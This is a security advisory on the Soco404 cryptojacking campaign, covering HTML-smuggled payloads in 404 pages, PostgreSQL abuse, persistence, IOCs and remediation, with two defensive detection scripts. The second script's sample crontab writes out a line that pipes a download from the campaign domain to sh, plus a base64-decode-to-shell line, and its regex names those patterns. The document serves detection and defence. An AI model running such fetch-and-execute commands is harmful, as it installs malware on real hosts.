July 29, 2025
Severity
High
Analysis Summary
The Soco404 cryptojacking campaign is a further evolution of earlier miner botnets that hides its payloads in HTML-smuggled 404 error pages. The attackers embed base64-encoded binaries between harmless-looking HTML tags on Google Sites pages and compromised Tomcat servers, which lets the payload pass traditional web filters and static scanners. The technique is used against both Linux and Windows hosts: fake error pages hosted on domains such as fastsoco.top deliver malware that is decoded and detonated in memory, which further complicates detection. The campaign is believed to have emerged in mid-2025 and builds on older attack vectors that targeted weak Tomcat credentials and unpatched Confluence systems.
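The delivery trick above is worth checking for directly: a 404 page that carries a very long base64 run which decodes to an ELF or PE image is not an error page. The following is an added example, not code from the original report or from the researchers, that carves such runs out of fetched HTML and checks the decoded bytes for executable magic. The sample page and the fake ELF payload it embeds are constructed here for illustration; the 200-character threshold is an assumption chosen to skip tokens and tiny inline images.

```python
import base64
import binascii
import re

# A base64 run this long (200 chars, about 150 bytes) is bigger than tokens or
# small inline images, so it is worth decoding. Threshold is an assumption.
MIN_B64_CHARS = 200
B64_RUN = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % MIN_B64_CHARS)

# Executable magic: ELF for the Linux payload, MZ (PE) for the Windows one.
# "MZ" is only two bytes, so a chance match is possible but rare at this size.
EXEC_MAGIC = ((b"\x7fELF", "ELF"), (b"MZ", "PE"))


def find_smuggled_binaries(html: str):
    """Return (offset, kind, raw_bytes) for each base64 run that decodes to an executable."""
    hits = []
    for m in B64_RUN.finditer(html):
        blob = m.group(0)
        padded = blob + "=" * (-len(blob) % 4)  # tolerate stripped padding
        try:
            raw = base64.b64decode(padded, validate=True)
        except binascii.Error:
            continue  # not decodable as base64, e.g. a run of letters in prose
        for magic, kind in EXEC_MAGIC:
            if raw.startswith(magic):
                hits.append((m.start(), kind, raw))
                break
    return hits


# Constructed sample (not a real capture): a fake ELF header plus filler stands in
# for the payload, hidden in a display:none div of an otherwise plain 404 page.
# A long base64 HTML comment and a short data: URI are included to show they are
# not reported.
FAKE_ELF = b"\x7fELF\x02\x01\x01\x00" + bytes(range(256))
PAYLOAD_B64 = base64.b64encode(FAKE_ELF).decode()
FILLER_B64 = base64.b64encode(b"A" * 300).decode()
SAMPLE_404 = f"""<html><head><title>404 Not Found</title></head>
<body><h1>Not Found</h1><p>The requested URL was not found on this server.</p>
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUg=="/>
<!-- {FILLER_B64} -->
<div style="display:none">{PAYLOAD_B64}</div>
</body></html>"""


if __name__ == "__main__":
    import sys

    # Usage: python smuggle_check.py [saved_page.html]; defaults to the sample.
    page = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_404
    for offset, kind, raw in find_smuggled_binaries(page):
        print(f"{kind} image of {len(raw)} bytes hidden at offset {offset}")
```

Run it over a saved copy of a suspicious error page, or wire it into a proxy or sandbox that sees HTTP bodies. It does not reassemble payloads that are split across several tags or interleaved with whitespace; strip whitespace inside the candidate element first if you suspect that variant.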
Researchers uncovered this variant while monitoring suspicious shell activity on publicly exposed PostgreSQL databases, which many cloud tenants leave open to the internet. The attackers abuse PostgreSQL's COPY FROM PROGRAM feature (available to superusers and members of the pg_execute_server_program role) to run arbitrary commands as the database's operating-system account, enabling lateral movement and large-scale miner deployment across mixed operating environments. Beyond misconfigured databases, the attackers also hijack legitimate web infrastructure, including compromised Korean transport websites, to deliver OS-specific payloads: soco.sh for Linux and ok.exe for Windows. These loaders are built for stealth: they self-delete immediately after launch and mimic legitimate system processes such as sd-pam, kworker/R-rcu_p, or randomly named Windows services in order to blend in and persist.
On Linux, the infection begins with a one-liner that fetches and runs the shell script. The script clears logs (/var/log/wtmp), terminates competing miners, and applies CPU tweaks such as huge pages and model-specific register (MSR) writes to improve mining throughput. A Go-based stub disguises itself as cpuhp/1 and mines Monero with XMRig, connecting to the c3pool and moneroocean pools under a hardcoded wallet ID. On Windows, the loader uses certutil, Invoke-WebRequest, or curl to drop ok.exe into C:\Users\Public\, injects it into conhost.exe, and removes traces by deleting the original file shortly after execution.
Persistence is robust on both platforms. The malware installs cron jobs and shell initialization hooks on Linux and disables Windows Event Logs on Windows to stay invisible. It communicates through local sockets, uses watchdog threads to restart itself if interrupted, and keeps running long after the infected 404 page has been closed. From the defender's perspective the only early signs may be subtle: a gradual dip in system performance and rising electricity usage, while the cryptojacking payload silently consumes CPU to mine cryptocurrency in the background.
Impact
- Gain Access
- Security Bypass
Indicators of Compromise
Domain Name
- www.fastsoco.top
- dblikes.cyou
- gulf.moneroocean.stream
- auto.c3pool.org
MD5
- 6a267dfa08378eab14650b8d5fda6171
- bb8fbe0f257508c78df00252de2fa48c
- d2226fa9e050f8fd5fe3d4aae27d3406
- bd8ce6bd59b1f648e0ac38e575780453
- fa904f9d5abecd5e62645b115f30d971
- 4c9676fdcaad779efbcaef5a72b319ef
SHA-256
- c9bb137d56fab7d52b3dbc85ae754b79d861a118bfb99566faaa342c978285ff
- bac4b166dec1df8aa823a15136c82c8b50960b11a0c4da68b8d7dedcb0f3a794
- c67e876d7b3ae5f3c4fd626d8ba62e77bd47dfdf51f7a4438edd64bd0f88ce3a
- 0086fe6259af25f3b5a12d81080bed61938cc70ebdf480501acc1c10ac39c74a
- 5b224a091151661943e038066ef03f7b5bab055187f3b1b582dbfe392e74c921
- e69e55027bf64011599ae1283d15d157bfefed1c03e20fe72ecf7e90fd451e76
SHA-1
- 7e8914b3071183b4077c1eaacf78a0c8439eb36d
- ef3d4b6d107a284f564001a7cb363ddaa583edac
- c2137a39bb0ff956b3648f6109f88584affaabcf
- 1285909dcbb999d59cfc62e46770fe4232dc0a05
- 6e0ea3e14ff64ad616b59a9b28453fd202da64aa
- 7d9587d40ed530a76266074484a73742c85303ee
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Secure Tomcat, Atlassian Confluence, and PostgreSQL servers: enforce strong, unique passwords, apply all available security updates, and keep COPY FROM PROGRAM out of reach of application accounts by never granting them superuser or the pg_execute_server_program role (the feature has no off switch of its own, so role hygiene is the control).
- Avoid exposing databases and admin interfaces to the internet; restrict access using firewalls, VPNs, and proper network segmentation.
- Use advanced security tools that can deeply inspect HTML content for hidden base64 payloads, especially in error pages.
- Deploy endpoint detection and response (EDR/XDR) solutions that support memory-based threat detection and process injection monitoring.
- Monitor for sustained high CPU usage, outbound connections to mining pools such as auto.c3pool.org and gulf.moneroocean.stream (these are public pools, so any connection from a server is a strong sign of mining whatever the actor), and DNS lookups or connections to fastsoco.top and dblikes.cyou.
- Regularly audit scheduled tasks, cron jobs, shell-init hooks, and unknown Windows services to remove any persistence mechanisms.
- Enable protections against log tampering and monitor for signs of log deletion or manipulation, such as missing entries in /var/log/wtmp or Windows Event Logs.
- Block known malicious domains using up-to-date threat intelligence feeds, and add any published mining wallet IDs from this campaign to detection content where proxy or pool traffic is inspected.
- Perform regular threat hunting for disguised processes (e.g., cpuhp/1, sd-pam, or random service names) and residual malware artifacts.
- Train IT and security teams to recognize modern smuggling techniques, including malware embedded within HTML error pages using base64 encoding.
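The Linux traits described in the analysis (loaders that self-delete after launch, processes named like kernel threads or sd-pam, cron and shell-init lines that fetch and pipe to a shell) map directly onto the hunting items above. The following is an added example, not the researchers' or the vendor's own tooling, that applies those checks. Genuine kernel threads are children of kthreadd (pid 2) and have no executable image, so readlink on /proc/<pid>/exe fails for them; a userland process wearing such a name gives itself away. The process snapshot and crontab lines are constructed for illustration, and the assumption that genuine sd-pam always runs from the systemd binary is labelled in the code.

```python
import os
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Kernel-thread names the loaders imitate (cpuhp/1, kworker/R-rcu_p) plus other
# common kernel-thread prefixes. Real ones have ppid 2 and no exe image.
KTHREAD_NAME = re.compile(r"^(kworker/|cpuhp/|ksoftirqd/|migration/|rcu_|kthreadd$)")
KTHREADD_PID = 2
# Assumption: genuine sd-pam is a forked child of "systemd --user", so its exe is
# the systemd binary at one of these paths (adjust for your distribution).
SD_PAM_NAMES = {"sd-pam", "(sd-pam)"}
SYSTEMD_EXE = ("/usr/lib/systemd/systemd", "/lib/systemd/systemd")
# Download-and-pipe-to-shell, or inline base64 decode, in cron / rc lines.
DROPPER_LINE = re.compile(r"(curl|wget)[^|\n]*\|\s*(ba)?sh\b|base64\s+(-d|--decode)\b")


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str
    exe: Optional[str]  # target of /proc/<pid>/exe, or None when unreadable


def flag_processes(procs: List[Proc]) -> List[Tuple[int, str]]:
    """Return (pid, reason) for processes showing the loader traits."""
    findings = []
    for p in procs:
        exe = p.exe or ""
        if exe.endswith(" (deleted)"):
            findings.append((p.pid, f"running from deleted binary {exe}"))
        looks_kthread = KTHREAD_NAME.match(p.comm) and p.pid != KTHREADD_PID
        if looks_kthread and (p.ppid != KTHREADD_PID or p.exe is not None):
            findings.append((p.pid, f"userland process named like kernel thread {p.comm!r}"))
        if p.comm in SD_PAM_NAMES and not exe.replace(" (deleted)", "").startswith(SYSTEMD_EXE):
            findings.append((p.pid, f"sd-pam impostor with exe {exe or '?'}"))
    return findings


def suspicious_shell_lines(lines: List[str]) -> List[str]:
    """Return crontab / shell-init lines that fetch-and-execute or decode inline payloads."""
    return [ln for ln in lines if not ln.lstrip().startswith("#") and DROPPER_LINE.search(ln)]


def snapshot_procs() -> List[Proc]:
    """Read live processes from /proc (Linux only) for use on a real host."""
    procs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        try:
            with open(f"/proc/{name}/stat") as fh:
                stat = fh.read()
            # comm sits in parentheses and may contain spaces; ppid is the 2nd field after it
            comm = stat[stat.index("(") + 1 : stat.rindex(")")]
            ppid = int(stat[stat.rindex(")") + 2 :].split()[1])
            try:
                exe = os.readlink(f"/proc/{name}/exe")
            except OSError:
                exe = None  # kernel threads have no image
            procs.append(Proc(int(name), ppid, comm, exe))
        except (OSError, ValueError):
            continue  # process exited mid-scan or unreadable
    return procs


# Constructed snapshot (not real host data): genuine kernel threads next to impostors.
SAMPLE_PROCS = [
    Proc(2, 0, "kthreadd", None),
    Proc(15, 2, "kworker/R-rcu_p", None),                        # genuine kernel thread
    Proc(23, 2, "cpuhp/1", None),                                # genuine kernel thread
    Proc(1200, 1000, "(sd-pam)", "/usr/lib/systemd/systemd"),    # genuine sd-pam
    Proc(999, 1, "sshd", "/usr/sbin/sshd"),
    Proc(4321, 1, "kworker/R-rcu_p", "/tmp/.x/soco (deleted)"),  # self-deleted loader (hypothetical path)
    Proc(4400, 4321, "cpuhp/1", "/tmp/.x/xmrig"),                # stub named cpuhp/1 (hypothetical path)
    Proc(5555, 1, "sd-pam", "/var/tmp/sd-pam"),                  # sd-pam lookalike outside systemd
]
# Constructed crontab lines; the URL reuses the campaign domain from the IOC list.
SAMPLE_CRON = [
    "# m h dom mon dow command",
    "*/5 * * * * /usr/local/bin/backup.sh",
    "* * * * * (curl -fsSL http://www.fastsoco.top/soco.sh || wget -qO- http://www.fastsoco.top/soco.sh) | sh",
    "@reboot echo aGVsbG8K | base64 -d | sh",
]

if __name__ == "__main__":
    for pid, reason in flag_processes(snapshot_procs()):
        print(f"pid {pid}: {reason}")
```

On a live host, feed `suspicious_shell_lines` the output of `crontab -l` for each user plus the contents of /etc/cron.d, /etc/crontab, and the shell rc and profile files. A process flagged as a deleted binary can still be recovered for analysis by copying /proc/<pid>/exe before it exits.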